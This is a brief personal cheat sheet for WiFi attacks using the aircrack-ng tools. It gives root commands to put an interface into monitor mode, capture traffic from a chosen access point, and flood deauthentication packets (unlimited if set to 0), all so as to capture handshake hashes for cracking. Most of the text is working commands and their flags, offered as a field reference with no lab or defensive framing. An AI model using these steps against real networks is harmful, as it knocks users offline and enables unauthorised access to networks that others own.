This is a little doc teaching you how to do wifi attacks. I always forget how to do it in the field, so here's a guide for when you're away from wifi. It's quick, and isn't overreaching on the info so you can reference it quickly. every command here must be run as root
We're going to assume wlan0 is the network interface you want to use. If you have time, read the man pages.
-
Starting your reciever into monitor mode
airmon-ng startwlan0When you'r done, you can doairmon-ng stop wlan0mon. -
Capturing nearby networks Your wireless interface should be renamed to something along the lines of wlan0mon.
airodump-ng -c 10 --bssid 00:1C:B3:09:85:15 wlan0mon\-c 10is the channel (if you don't know it, leave it out)--bssid 00:1C:B3:09:85:15is the mac of the access point (again, if you don't know it, leave it out)wlan0monis the interface (you have to include this)
-
Deauthentication
aireplay-ng -b 00:1C:B3:09:85:15 -0 5 wlan0mon-bstands for bssid, which is the mac of the access point you want to deauth-0 5selects deauthentication attack, and sends 5 deauth packets (set to 0 to send an unlimited number)wlan0monis the interface
If your airodump says you've captured the hashes, you're good to go with cracking!